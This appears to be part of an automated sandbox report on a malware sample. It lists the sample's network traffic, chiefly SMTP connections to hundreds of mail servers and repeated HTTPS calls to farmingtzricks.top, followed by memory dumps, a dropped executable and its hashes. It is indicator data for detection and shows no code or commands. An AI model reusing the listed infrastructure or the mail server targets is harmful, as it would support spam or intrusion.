| US | 8.8.8.8:53 | r4---sn-aigzrn76.gvt1.com | udp |
| US | 8.8.8.8:53 | r4.sn-aigzrn76.gvt1.com | udp |
| GB | 173.194.137.73:443 | r4.sn-aigzrn76.gvt1.com | tcp |
| US | 8.8.8.8:53 | r4.sn-aigzrn76.gvt1.com | udp |
| GB | 173.194.137.73:443 | r4.sn-aigzrn76.gvt1.com | udp |
| US | 8.8.8.8:53 | mail.rravena.k12.ne.us | udp |
| US | 8.8.8.8:53 | poczta.pl | udp |
| US | 8.8.8.8:53 | mail.educacion.cajasan.com | udp |
| US | 8.8.8.8:53 | mail.sess-equipment.com | udp |
| US | 8.8.8.8:53 | secure.cegi.de | udp |
| US | 8.8.8.8:53 | out.reecorp.com | udp |
| US | 8.8.8.8:53 | alt4.aspmx.l.google.com | udp |
| US | 8.8.8.8:53 | mx2.telenet-ops.be | udp |
| BE | 195.130.132.9:587 | mx2.telenet-ops.be | tcp |
| TW | 142.250.157.26:587 | alt4.aspmx.l.google.com | tcp |
| PL | 194.181.93.175:587 | poczta.pl | tcp |
| US | 8.8.8.8:53 | ASPMX.L.GOOGLE.COM | udp |
| NL | 142.250.27.27:465 | ASPMX.L.GOOGLE.COM | tcp |
| US | 216.21.224.199:465 | mail.sess-equipment.com | tcp |
| US | 8.8.8.8:53 | out.sensis.ro | udp |
| US | 8.8.8.8:53 | bbox.fr | udp |
| US | 8.8.8.8:53 | gamil.com | udp |
| US | 8.8.8.8:53 | smtp.garudapower.com.partial | udp |
| US | 8.8.8.8:53 | mail.centralpetvet.com | udp |
| US | 192.252.154.117:587 | gamil.com | tcp |
| US | 8.8.8.8:53 | mx2.hc4144-24.iphmx.com | udp |
| US | 8.8.8.8:53 | out.edition-cobra.fr | udp |
| US | 68.232.130.252:465 | mx2.hc4144-24.iphmx.com | tcp |
| US | 198.0.171.177:465 | mail.centralpetvet.com | tcp |
| US | 8.8.8.8:53 | mail.technologist.com | udp |
| US | 8.8.8.8:53 | mail.forumaccess.com.br | udp |
| US | 204.74.99.100:587 | mail.technologist.com | tcp |
| US | 8.8.8.8:53 | spi-chim.u-3mrs.fr | udp |
| US | 8.8.8.8:53 | ztrbb.de | udp |
| FI | 65.109.49.216:587 | ztrbb.de | tcp |
| FR | 194.167.229.69:587 | spi-chim.u-3mrs.fr | tcp |
| US | 8.8.8.8:53 | fedex.com | udp |
| US | 8.8.8.8:53 | secure.yalla.net | udp |
| US | 8.8.8.8:53 | smtp.yazoo.co.uk | udp |
| US | 8.8.8.8:53 | secure.outolook.com | udp |
| US | 170.170.195.98:587 | fedex.com | tcp |
| FR | 134.119.176.29:465 | secure.outolook.com | tcp |
| US | 8.8.8.8:53 | out.poczta.neostrada.pl | udp |
| US | 8.8.8.8:53 | out.resourcedevelopment.net | udp |
| US | 8.8.8.8:53 | uni-mainz.de | udp |
| DE | 134.93.178.31:465 | uni-mainz.de | tcp |
| US | 8.8.8.8:53 | mail.skole.hr | udp |
| US | 8.8.8.8:53 | secure.mywdo.com | udp |
| US | 8.8.8.8:53 | bolt.eu | udp |
| US | 8.8.8.8:53 | seznam.cz | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| GB | 18.172.88.32:465 | bolt.eu | tcp |
| US | 209.17.116.163:465 | out.resourcedevelopment.net | tcp |
| US | 8.8.8.8:53 | secure.ac-versailles.fr | udp |
| US | 8.8.8.8:53 | q.com | udp |
| US | 8.8.8.8:53 | amber.mobily.com.sa | udp |
| AU | 45.154.183.183:587 | q.com | tcp |
| US | 8.8.8.8:53 | smtp.comcast.net | udp |
| US | 8.8.8.8:53 | xplannersr.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| SA | 84.23.107.229:587 | amber.mobily.com.sa | tcp |
| US | 8.8.8.8:53 | eforward2.registrar-servers.com | udp |
| US | 8.8.8.8:53 | smtp.iinet.net.au | udp |
| US | 8.8.8.8:53 | mail.avto-bezlaj.si | udp |
| US | 8.8.8.8:53 | earthlink.net | udp |
| US | 8.8.8.8:53 | gorge-net.mx.av-mx.com | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 162.255.118.52:587 | eforward2.registrar-servers.com | tcp |
| AU | 52.62.236.135:587 | smtp.iinet.net.au | tcp |
| US | 150.136.204.204:587 | gorge-net.mx.av-mx.com | tcp |
| US | 104.19.239.228:587 | earthlink.net | tcp |
| SI | 185.69.149.131:587 | mail.avto-bezlaj.si | tcp |
| US | 8.8.8.8:53 | secure.dudley.gov.uk | udp |
| US | 8.8.8.8:53 | mmc-co-za.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | lans.gov.la | udp |
| US | 8.8.8.8:53 | secure.bearschare.fr | udp |
| US | 8.8.8.8:53 | ALT3.ASPMX.L.GOOGLE.COM | udp |
| US | 8.8.8.8:53 | mail.ziggo.nl | udp |
| SG | 74.125.200.27:465 | ALT3.ASPMX.L.GOOGLE.COM | tcp |
| IE | 52.101.68.36:587 | mmc-co-za.mail.protection.outlook.com | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | tele2.it | udp |
| US | 8.8.8.8:53 | planet.nl | udp |
| US | 8.8.8.8:53 | optonline.net | udp |
| US | 167.206.148.154:587 | optonline.net | tcp |
| IE | 52.18.216.171:587 | planet.nl | tcp |
| US | 8.8.8.8:53 | out.avenuelitho.com | udp |
| US | 8.8.8.8:53 | smtp.interfree.it | udp |
| US | 8.8.8.8:53 | securesmtp.pelung.com | udp |
| US | 8.8.8.8:53 | janca.de | udp |
| US | 8.8.8.8:53 | yaoo.com | udp |
| US | 8.8.8.8:53 | hcwainwright.com | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| DE | 81.169.145.163:587 | janca.de | tcp |
| IT | 80.91.55.62:587 | smtp.interfree.it | tcp |
| US | 13.248.158.7:587 | yaoo.com | tcp |
| US | 8.8.8.8:53 | secure.wehrhahn-verlag.de | udp |
| US | 8.8.8.8:53 | basaltosc.com.br | udp |
| US | 8.8.8.8:53 | smtp.student.newton.k12.in.us | udp |
| US | 8.8.8.8:53 | mail.isaacjoe.plus.com | udp |
| US | 8.8.8.8:53 | smtp.horngroup.com | udp |
| US | 69.164.193.148:587 | hcwainwright.com | tcp |
| HR | 193.198.252.97:587 | mail.skole.hr | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | securesmtp.copinaval.com | udp |
| US | 8.8.8.8:53 | smtp.campus.fct.unl.pt | udp |
| US | 8.8.8.8:53 | smtp.ap.senai.br | udp |
| US | 8.8.8.8:53 | secure.outdrs.net | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | securesmtp.pchigh.k12.hi.us | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | smtp.vodafone.de | udp |
| US | 8.8.8.8:53 | angel-cakes.net | udp |
| US | 8.8.8.8:53 | mail1.qlc.co.in | udp |
| BR | 177.20.224.233:465 | basaltosc.com.br | tcp |
| DE | 151.189.176.206:587 | smtp.vodafone.de | tcp |
| US | 8.8.8.8:53 | mail3.o.check24.de | udp |
| US | 8.8.8.8:53 | ab-concept.eu | udp |
| US | 8.8.8.8:53 | voila.fr | udp |
| US | 8.8.8.8:53 | mx01.hornetsecurity.com | udp |
| DE | 46.30.5.170:587 | mail3.o.check24.de | tcp |
| DE | 94.100.132.8:587 | mx01.hornetsecurity.com | tcp |
| IE | 3.5.70.34:587 | voila.fr | tcp |
| DE | 85.13.161.81:587 | ab-concept.eu | tcp |
| US | 8.8.8.8:53 | smtp.virgilio.it | udp |
| US | 8.8.8.8:53 | azet.sk | udp |
| NL | 84.116.6.3:587 | mail.ziggo.nl | tcp |
| US | 8.8.8.8:53 | securesmtp.pandacomdirekt.de | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| NL | 142.250.27.27:587 | ASPMX.L.GOOGLE.COM | tcp |
| US | 8.8.8.8:53 | mx04.st-andrews.ac.uk | udp |
| US | 8.8.8.8:53 | secure.cabovisao.pt | udp |
| US | 8.8.8.8:53 | ridesmtaext02.roche.com | udp |
| US | 8.8.8.8:53 | secure.dormilandia.com.co | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | secure.optononline.net | udp |
| US | 8.8.8.8:53 | nsty.in | udp |
| US | 8.8.8.8:53 | secure.llaut.org | udp |
| US | 198.21.25.78:587 | ridesmtaext02.roche.com | tcp |
| GB | 138.251.7.124:587 | mx04.st-andrews.ac.uk | tcp |
| NL | 95.211.75.26:587 | secure.optononline.net | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | smtp.veratour.it | udp |
| US | 8.8.8.8:53 | smtp.cquel.com | udp |
| US | 8.8.8.8:53 | intmarktech-com.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | secure.jasonfitzsimmons.com.au | udp |
| US | 52.101.42.4:465 | intmarktech-com.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | gmbol.cem | udp |
| US | 8.8.8.8:53 | out.corketb.ie | udp |
| US | 8.8.8.8:53 | secure.ofita.net | udp |
| US | 8.8.8.8:53 | eju.u-beurgegze.fr | udp |
| US | 8.8.8.8:53 | hellwegen-holtzhausen.de | udp |
| US | 8.8.8.8:53 | secure.ingo.ua | udp |
| DE | 49.13.50.5:465 | hellwegen-holtzhausen.de | tcp |
| US | 8.8.8.8:53 | mail.stagingspace.co.uk | udp |
| US | 8.8.8.8:53 | smtp.blome-darfeld.de | udp |
| US | 8.8.8.8:53 | smtp.urugged.fr | udp |
| US | 8.8.8.8:53 | securesmtp.lujasobo.prochowice.pl | udp |
| US | 8.8.8.8:53 | out.guruku.id | udp |
| IN | 103.19.136.7:465 | mail1.qlc.co.in | tcp |
| US | 8.8.8.8:53 | ggtsrl-it.mail.protection.outlook.com | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | securesmtp.cleantech.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| IE | 52.101.68.18:465 | ggtsrl-it.mail.protection.outlook.com | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | secure.amcaarchitect.co.uk | udp |
| US | 8.8.8.8:53 | u-psud.fr | udp |
| US | 8.8.8.8:53 | mail.thecladdagh.com | udp |
| FR | 129.175.212.14:25 | u-psud.fr | tcp |
| US | 8.8.8.8:53 | securesmtp.trbnf.com | udp |
| US | 8.8.8.8:53 | fastweb.it | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| IT | 62.101.76.218:587 | fastweb.it | tcp |
| NL | 161.35.84.175:465 | mail.thecladdagh.com | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | mail.hostdeluxe.net | udp |
| US | 8.8.8.8:53 | smtp.idsland.com | udp |
| US | 8.8.8.8:53 | aspmx5.googlemail.com | udp |
| TW | 142.250.157.27:587 | aspmx5.googlemail.com | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | secure.gemail.con | udp |
| US | 8.8.8.8:53 | out.webinarworld.org | udp |
| US | 8.8.8.8:53 | out.onrc.ro | udp |
| US | 8.8.8.8:53 | irglux-com.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | mail.student.ecpps.k12.nc.us | udp |
| US | 8.8.8.8:53 | alt1.aspmx.l.google.com | udp |
| US | 8.8.8.8:53 | email.cz | udp |
| US | 104.19.239.228:587 | earthlink.net | tcp |
| US | 8.8.8.8:53 | secure.vinacominpower.vn | udp |
| US | 8.8.8.8:53 | azet.sk | udp |
| US | 8.8.8.8:53 | mail.dk | udp |
| US | 8.8.8.8:53 | smtp.forever-night.com | udp |
| US | 8.8.8.8:53 | out.gazelle.nl | udp |
| TW | 142.250.157.26:465 | alt4.aspmx.l.google.com | tcp |
| SK | 91.235.52.77:587 | azet.sk | tcp |
| US | 75.2.73.197:465 | out.webinarworld.org | tcp |
| DE | 142.251.9.26:587 | alt1.aspmx.l.google.com | tcp |
| DE | 18.192.246.145:587 | mail.dk | tcp |
| IE | 52.101.68.27:465 | irglux-com.mail.protection.outlook.com | tcp |
| DE | 91.195.240.13:587 | smtp.forever-night.com | tcp |
| CZ | 77.75.78.196:587 | email.cz | tcp |
| US | 8.8.8.8:53 | 163.net | udp |
| US | 8.8.8.8:53 | out.maisconsultores.pt | udp |
| US | 8.8.8.8:53 | secure.andreato.com.br | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| HK | 118.103.150.80:587 | 163.net | tcp |
| DE | 188.40.126.171:587 | out.maisconsultores.pt | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| SK | 91.235.52.77:587 | azet.sk | tcp |
| US | 8.8.8.8:53 | mail.lederhausen.com | udp |
| US | 172.67.192.180:465 | mail.lederhausen.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | securesmtp.ukleadingb2b.info | udp |
| US | 13.248.158.7:587 | yaoo.com | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | aspmx2.googlemail.com | udp |
| DE | 142.251.9.27:587 | aspmx2.googlemail.com | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| DE | 142.251.9.26:587 | alt1.aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| IT | 213.209.1.145:587 | smtp.virgilio.it | tcp |
| SK | 91.235.52.77:587 | azet.sk | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | out.maill.com | udp |
| US | 8.8.8.8:53 | out.najljhmc.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| DE | 64.190.63.222:587 | out.maill.com | tcp |
| US | 8.8.8.8:53 | mail02.jeffersonbox.com | udp |
| US | 8.8.8.8:53 | out.in-hochfranken.de | udp |
| DE | 161.156.29.45:25 | mail02.jeffersonbox.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | mx02.mailplug.com | udp |
| US | 192.252.154.117:587 | gamil.com | tcp |
| US | 8.8.8.8:53 | goldenislesrilanka.com | udp |
| US | 157.173.209.244:465 | goldenislesrilanka.com | tcp |
| US | 8.8.8.8:53 | smtp.icbocchi.istruzioneer.it | udp |
| US | 8.8.8.8:53 | tonline.de | udp |
| US | 8.8.8.8:53 | ns.sympatico.ca | udp |
| US | 8.8.8.8:53 | out.sourabh.com | udp |
| IE | 3.5.70.34:587 | voila.fr | tcp |
| CA | 142.166.145.129:587 | ns.sympatico.ca | tcp |
| DE | 80.158.66.24:587 | tonline.de | tcp |
| US | 76.223.54.146:587 | out.sourabh.com | tcp |
| US | 8.8.8.8:53 | i.ua | udp |
| US | 8.8.8.8:53 | out.nokiamai.co.za | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| KR | 223.26.214.9:465 | mx02.mailplug.com | tcp |
| US | 104.18.3.81:587 | i.ua | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | out.gedonsoft.de | udp |
| US | 8.8.8.8:53 | out.ibas-labs.de | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | mail.quidinfo.it | udp |
| US | 8.8.8.8:53 | afitex-com.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | secure.alumno.msev.gob.mx | udp |
| IE | 52.101.68.15:587 | afitex-com.mail.protection.outlook.com | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | suckmusicbr.com.br | udp |
| US | 8.8.8.8:53 | aumbrasil.org.br | udp |
| NL | 142.250.27.27:465 | ASPMX.L.GOOGLE.COM | tcp |
| DE | 5.75.210.149:443 | tcp | |
| US | 8.8.8.8:53 | presidencyhighschool.com | udp |
| US | 104.21.32.1:465 | presidencyhighschool.com | tcp |
| US | 8.8.8.8:53 | smtp.kfzfqszg.com | udp |
| TW | 142.250.157.26:587 | alt4.aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | mx.serveriai.lt | udp |
| US | 8.8.8.8:53 | mx.core.locaweb.com.br | udp |
| BR | 177.153.23.241:587 | mx.core.locaweb.com.br | tcp |
| LT | 79.98.24.212:587 | mx.serveriai.lt | tcp |
| US | 8.8.8.8:53 | securesmtp.deventer.nl | udp |
| US | 8.8.8.8:53 | secure.assnat.qc.ca | udp |
| US | 8.8.8.8:53 | smtp.kaledon.com | udp |
| US | 8.8.8.8:53 | out.clamagephoto.com | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| BE | 195.130.132.9:587 | mx2.telenet-ops.be | tcp |
| US | 192.252.154.117:587 | gamil.com | tcp |
| US | 8.8.8.8:53 | smtp.oliodecarlo.com | udp |
| US | 8.8.8.8:53 | out.mahasiswa.integra.its.ac.id | udp |
| NL | 178.22.57.66:465 | securesmtp.deventer.nl | tcp |
| IT | 62.149.128.202:465 | smtp.kaledon.com | tcp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | mail.three.com.au | udp |
| US | 35.212.15.21:587 | out.clamagephoto.com | tcp |
| US | 8.8.8.8:53 | mxg.eu.mpssec.net | udp |
| US | 8.8.8.8:53 | secure.zsklatovyplanicka.cz | udp |
| IE | 54.77.99.92:587 | mxg.eu.mpssec.net | tcp |
| AU | 202.124.68.39:587 | mail.three.com.au | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | smtp.shaw.ca | udp |
| US | 8.8.8.8:53 | patriotmudlogging.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | citromail.hu | udp |
| US | 8.8.8.8:53 | smtp.oransd.fr | udp |
| US | 8.8.8.8:53 | secure.tiscali.cz | udp |
| US | 8.8.8.8:53 | smtp.ig.com.br | udp |
| BR | 168.0.132.203:587 | smtp.ig.com.br | tcp |
| DE | 167.99.248.199:587 | citromail.hu | tcp |
| US | 8.8.8.8:53 | securesmtp.sl-itech.co.uk | udp |
| US | 8.8.8.8:53 | mpt-mp-br.mail.protection.outlook.com | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | secure.porteo.com | udp |
| CA | 64.59.136.142:587 | smtp.shaw.ca | tcp |
| US | 8.8.8.8:53 | securesmtp.scottish-courage.co.uk | udp |
| US | 8.8.8.8:53 | mail.rfd.gov.vn | udp |
| TW | 142.250.157.26:587 | alt4.aspmx.l.google.com | tcp |
| NL | 142.250.27.27:465 | ASPMX.L.GOOGLE.COM | tcp |
| US | 8.8.8.8:53 | mail.hkouaj.com | udp |
| KR | 121.78.127.249:465 | secure.porteo.com | tcp |
| US | 8.8.8.8:53 | smtp.ivycarly.com | udp |
| US | 8.8.8.8:53 | securesmtp.rccs.us | udp |
| US | 8.8.8.8:53 | mail.mak.ac.ug | udp |
| SG | 74.125.200.27:587 | ALT3.ASPMX.L.GOOGLE.COM | tcp |
| HK | 156.226.39.134:465 | patriotmudlogging.com | tcp |
| UG | 196.43.133.28:587 | mail.mak.ac.ug | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 52.101.41.58:465 | mpt-mp-br.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | securesmtp.pacificandes.com | udp |
| IT | 213.209.1.145:587 | smtp.virgilio.it | tcp |
| US | 8.8.8.8:53 | andreagilardi.me | udp |
| US | 8.8.8.8:53 | mail.angola.bes.pt | udp |
| US | 8.8.8.8:53 | amlbusinesssolutions-in.mail.protection.outlook.com | udp |
| DE | 167.99.248.199:587 | citromail.hu | tcp |
| US | 8.8.8.8:53 | mail.kwicec.ac.th | udp |
| DE | 142.251.9.26:587 | alt1.aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | mx2.winnersgroup.sk | udp |
| US | 8.8.8.8:53 | edmassessoria.com.br | udp |
| US | 8.8.8.8:53 | mail.ua.pt | udp |
| US | 8.8.8.8:53 | securesmtp.grandview.com | udp |
| US | 8.8.8.8:53 | peoplepc.com | udp |
| US | 8.8.8.8:53 | out.nsps.sg | udp |
| US | 8.8.8.8:53 | smtp.crvasco.com.br | udp |
| US | 8.8.8.8:53 | fallbackmx.spamexperts.eu | udp |
| US | 8.8.8.8:53 | secure.drtransportes.net | udp |
| US | 8.8.8.8:53 | smtp.fgadealer.es | udp |
| US | 8.8.8.8:53 | smtp.phelene.fr | udp |
| NL | 142.250.27.27:465 | ASPMX.L.GOOGLE.COM | tcp |
| PT | 193.136.173.7:2525 | mail.ua.pt | tcp |
| US | 172.64.150.215:587 | peoplepc.com | tcp |
| IN | 52.101.145.2:587 | amlbusinesssolutions-in.mail.protection.outlook.com | tcp |
| GB | 193.200.214.101:465 | fallbackmx.spamexperts.eu | tcp |
| DE | 217.61.3.26:587 | mx2.winnersgroup.sk | tcp |
| CA | 52.60.87.163:587 | andreagilardi.me | tcp |
| BR | 89.117.6.36:465 | edmassessoria.com.br | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | mail.h-email.net | udp |
| US | 8.8.8.8:53 | mail.uqar.ca | udp |
| US | 8.8.8.8:53 | smtp.weimar.fr | udp |
| US | 8.8.8.8:53 | mail.hot.ee | udp |
| DE | 49.13.4.90:587 | mail.h-email.net | tcp |
| DK | 194.19.134.85:587 | mail.hot.ee | tcp |
| US | 208.91.197.27:587 | securesmtp.pacificandes.com | tcp |
| US | 8.8.8.8:53 | mail.ssfcu.org | udp |
| US | 8.8.8.8:53 | atlanticbb.net | udp |
| US | 8.8.8.8:53 | elmpictures.com | udp |
| US | 162.241.224.26:587 | elmpictures.com | tcp |
| US | 65.175.128.109:587 | atlanticbb.net | tcp |
| VN | 203.175.106.110:465 | mail.rfd.gov.vn | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | secure.stepone.com | udp |
| US | 8.8.8.8:53 | securesmtp.edu.jarvenpaa.fi | udp |
| US | 8.8.8.8:53 | mail.newscorp.com | udp |
| US | 8.8.8.8:53 | smtp.bpusd.net | udp |
| US | 8.8.8.8:53 | gm.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | secure.nba.com | udp |
| NL | 142.250.27.27:465 | ASPMX.L.GOOGLE.COM | tcp |
| NL | 142.250.27.27:587 | ASPMX.L.GOOGLE.COM | tcp |
| US | 8.8.8.8:53 | bft.fr | udp |
| US | 8.8.8.8:53 | securesmtp.peche95.fr | udp |
| US | 8.8.8.8:53 | mail.cnh.com | udp |
| US | 198.208.74.205:587 | gm.com | tcp |
| US | 68.232.204.104:465 | mail.newscorp.com | tcp |
| GB | 2.18.66.74:587 | secure.nba.com | tcp |
| US | 146.47.242.5:465 | mail.cnh.com | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | mail.muntzer.fr | udp |
| US | 8.8.8.8:53 | securesmtp.elderecho.com | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | mail.libaro.it | udp |
| US | 8.8.8.8:53 | out.comcast.html | udp |
| US | 8.8.8.8:53 | smtp.520zh.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| IT | 81.88.48.101:465 | mail.muntzer.fr | tcp |
| ES | 91.142.210.2:465 | securesmtp.elderecho.com | tcp |
| US | 8.8.8.8:53 | out.janai.com.au | udp |
| US | 8.8.8.8:53 | mail.enginehead.net | udp |
| DE | 142.251.9.26:465 | alt1.aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | smtp.belden-cd.com | udp |
| US | 8.8.8.8:53 | xerox.com | udp |
| US | 13.8.148.11:587 | xerox.com | tcp |
| US | 8.8.8.8:53 | securesmtp.cavtel.net | udp |
| US | 8.8.8.8:53 | out.yahh.fr | udp |
| US | 8.8.8.8:53 | secure.ratbaggames.com | udp |
| US | 8.8.8.8:53 | secure.deltalearns.ca | udp |
| DE | 64.190.63.222:587 | out.yahh.fr | tcp |
| IE | 91.136.8.160:587 | mail.enginehead.net | tcp |
| BR | 187.6.211.40:587 | oi.com.br | tcp |
| NL | 84.116.6.3:587 | mail.ziggo.nl | tcp |
| US | 8.8.8.8:53 | sale.cz | udp |
| US | 8.8.8.8:53 | securesmtp.fairfaxmortgage.com | udp |
| US | 8.8.8.8:53 | out.fwalter.fr | udp |
| US | 8.8.8.8:53 | PUNGKOOKID.COM | udp |
| CZ | 217.198.114.185:465 | sale.cz | tcp |
| US | 8.8.8.8:53 | home.com | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | smtp.synchrony.com | udp |
| US | 8.8.8.8:53 | smtp-in.sfr.fr | udp |
| US | 8.8.8.8:53 | campolympia-com.mail.protection.outlook.com | udp |
| FR | 93.17.128.123:587 | smtp-in.sfr.fr | tcp |
| US | 52.101.194.0:587 | campolympia-com.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | aon.at | udp |
| US | 8.8.8.8:53 | cg14.fr | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | securesmtp.gnaul.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| AT | 193.81.82.81:587 | aon.at | tcp |
| US | 8.8.8.8:53 | unitedavg-com.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | smtp.student.aru.ac.uk | udp |
| US | 8.8.8.8:53 | mail.dreamhouse.info.pl | udp |
| US | 3.18.7.81:587 | securesmtp.gnaul.com | tcp |
| US | 52.101.8.42:587 | unitedavg-com.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | out.sdlweb.pt | udp |
| BR | 168.0.132.203:587 | smtp.ig.com.br | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | mail.cottonwoodmedical.com | udp |
| US | 8.8.8.8:53 | out.ministryhome.org | udp |
| US | 8.8.8.8:53 | lineone.net | udp |
| US | 8.8.8.8:53 | securesmtp.uhaglobal.us | udp |
| US | 8.8.8.8:53 | secure.hockeycurve.com | udp |
| GB | 212.74.99.30:587 | lineone.net | tcp |
| US | 8.8.8.8:53 | smtp.lunarian.site | udp |
| US | 8.8.8.8:53 | out.tecro.us | udp |
| US | 8.8.8.8:53 | securesmtp.cofi.com | udp |
| US | 8.8.8.8:53 | kongju.ac.kr | udp |
| US | 8.8.8.8:53 | smtp.kw02studios.com | udp |
| US | 8.8.8.8:53 | edu.unisinos.br | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| KR | 203.253.33.69:465 | kongju.ac.kr | tcp |
| US | 35.237.212.184:587 | home.com | tcp |
| US | 8.8.8.8:53 | mail.vd-p.com | udp |
| US | 8.8.8.8:53 | securesmtp.mqegrmd.com | udp |
| US | 8.8.8.8:53 | hamblecolege.co.uk | udp |
| NL | 142.250.27.27:587 | ASPMX.L.GOOGLE.COM | tcp |
| US | 8.8.8.8:53 | abv.bg | udp |
| US | 8.8.8.8:53 | secure.butogrbf.pl | udp |
| US | 8.8.8.8:53 | cluster1.us.messagelabs.com | udp |
| BG | 194.153.145.104:587 | abv.bg | tcp |
| US | 67.219.250.212:465 | cluster1.us.messagelabs.com | tcp |
| US | 8.8.8.8:53 | mail.gp-h84608.nhs.uk | udp |
| US | 8.8.8.8:53 | secure.proton.me | udp |
| US | 8.8.8.8:53 | emotic.fr | udp |
| US | 8.8.8.8:53 | securesmtp.esasd.net | udp |
| US | 8.8.8.8:53 | mmelaholdings.net | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| FR | 213.186.33.5:465 | emotic.fr | tcp |
| US | 8.8.8.8:53 | mail.ricoh.fr | udp |
| FR | 194.206.228.42:587 | mail.ricoh.fr | tcp |
| ZA | 196.40.97.162:587 | mmelaholdings.net | tcp |
Files
memory/2676-0-0x00000000003F0000-0x00000000006FD000-memory.dmp
memory/2676-1-0x0000000077200000-0x0000000077202000-memory.dmp
memory/2676-2-0x00000000003F1000-0x0000000000451000-memory.dmp
memory/2676-3-0x00000000003F0000-0x00000000006FD000-memory.dmp
memory/2676-4-0x00000000003F0000-0x00000000006FD000-memory.dmp
memory/2676-5-0x00000000003F0000-0x00000000006FD000-memory.dmp
memory/2676-6-0x00000000003F1000-0x0000000000451000-memory.dmp
memory/2676-7-0x00000000003F0000-0x00000000006FD000-memory.dmp
\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
| MD5 | 1565063ca3d43812789fbf960418659e |
| SHA1 | d710ecdf1861e25498d1886f8c2a44f31826fd55 |
| SHA256 | c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978 |
| SHA512 | eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42 |
memory/2676-17-0x00000000003F0000-0x00000000006FD000-memory.dmp
memory/3008-20-0x00000000010B0000-0x000000000156C000-memory.dmp
